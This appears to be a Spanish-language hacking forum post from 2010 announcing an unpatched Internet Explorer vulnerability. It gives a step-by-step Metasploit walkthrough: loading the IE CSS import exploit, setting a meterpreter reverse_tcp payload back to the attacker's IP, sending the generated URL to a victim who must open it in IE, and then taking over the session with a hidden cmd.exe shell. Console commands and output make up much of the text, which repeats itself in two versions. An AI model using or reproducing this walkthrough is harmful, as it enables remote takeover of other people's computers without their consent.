[0Day] Todas las Versiones de Internet Explorer
Publicado: 30 Dic 2010, 19:23
Esta vulnerabilidad es nueva y todavía no es parchada oficialmente por el equipo de Microsoft.
Exploit en Ruby: Descargar código del exploit: [Enlace externo eliminado para invitados]
Los que entiendan Ruby lo pueden analizar y les recomiendo que lo lean y jueguen con él así se entretendrán un rato intentando entenderlo al 100%.
Si quieren de verdad meterse en el mundo del "hacking" si es que se le puede llamar así, tienen que aprender a programar y a entender todo tipo de códigos, en especial perl y ruby (sin mencionar los que si o si tienen que saber como HTML y PHP). Bueno, y para todos aquellos que lo quieren todo facilito y sin perder tiempo intentando entender las cosas, está Metasploit.
Partimos Metasploit y ejecutamos svn update para que se actualice y descargue el exploit que usaremos aquí:
Luego desde Metasploit hacemos lo siguiente:
Donde:
use exploit/windows/browser/ms11_xxx_ie_css_import (Definimos el exploit que vamos a usar)
set PAYLOAD windows/meterpreter/reverse_tcp (Definimos el Payload que usaremos)
set SRVHOST 200.152.251.123 (IP local donde va a montar el servicio, o sea la nuestra)
set LHOST 200.152.251.123 (IP adonde se conectará el remoto, o sea la nuestra)
exploit (echamos a correr el exploit)
Bueno, lo importante de esto es la url que nos tira metasploit:
Esa Url se le tiene que enviar a nuestro remoto y obligatoriamente tiene que abrirla con IE.
Cuando abra la URL aparecerán un montón de secuencias como esto:
Todo OK, ahora verificamos si nuestro remoto cayo:
Si aparece una sesión significa que nuestro remoto cayó y ahora nos queda conectarnos a ella:
Y luego pueden ejecutar cualquiera de estos 2 comandos:
Saludos!
Exploit en Ruby: Descargar código del exploit: [Enlace externo eliminado para invitados]
Los que entiendan Ruby lo pueden analizar y les recomiendo que lo lean y jueguen con él así se entretendrán un rato intentando entenderlo al 100%.
Si quieren de verdad meterse en el mundo del "hacking" si es que se le puede llamar así, tienen que aprender a programar y a entender todo tipo de códigos, en especial perl y ruby (sin mencionar los que si o si tienen que saber como HTML y PHP). Bueno, y para todos aquellos que lo quieren todo facilito y sin perder tiempo intentando entender las cosas, está Metasploit.
Partimos Metasploit y ejecutamos svn update para que se actualice y descargue el exploit que usaremos aquí:
Código: Seleccionar todo
ms11_xxx_ie_css_import.
Código: Seleccionar todo
msf > use exploit/windows/browser/ms11_xxx_ie_css_import
msf exploit (ms11_xxx_ie_css_import) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit (ms11_xxx_ie_css_import) > set SRVHOST 200.152.251.123
SRVHOST => 200.152.251.123
msf exploit (ms11_xxx_ie_css_import) > set LHOST 200.152.251.123
LHOST => 200.152.251.123
msf exploit (ms11_xxx_ie_css_import) > exploit
[+] Exploit running as background job.
[+] Started reverse handler on 200.152.251.123:4444
[+] Using URL: http://200.152.251.123:8080/WrwOMjN
use exploit/windows/browser/ms11_xxx_ie_css_import (Definimos el exploit que vamos a usar)
set PAYLOAD windows/meterpreter/reverse_tcp (Definimos el Payload que usaremos)
set SRVHOST 200.152.251.123 (IP local donde va a montar el servicio, o sea la nuestra)
set LHOST 200.152.251.123 (IP adonde se conectará el remoto, o sea la nuestra)
exploit (echamos a correr el exploit)
Bueno, lo importante de esto es la url que nos tira metasploit:
Código: Seleccionar todo
http://200.152.251.123:8080/WrwOMjN
Cuando abra la URL aparecerán un montón de secuencias como esto:
Código: Seleccionar todo
[+] Spawning a notepad.exe host process...
[+] Migrating into ID 4435
msf exploit (ms11_xxx_ie_css_import) >
Código: Seleccionar todo
msf exploit (ms11_xxx_ie_css_import) > sessions 1
Código: Seleccionar todo
msf exploit (ms11_xxx_ie_css_import) > sessions -i 1
Código: Seleccionar todo
msf exploit (ms11_xxx_ie_css_import) > shell
msf exploit (ms11_xxx_ie_css_import) > execute -f cmd.exe -H -i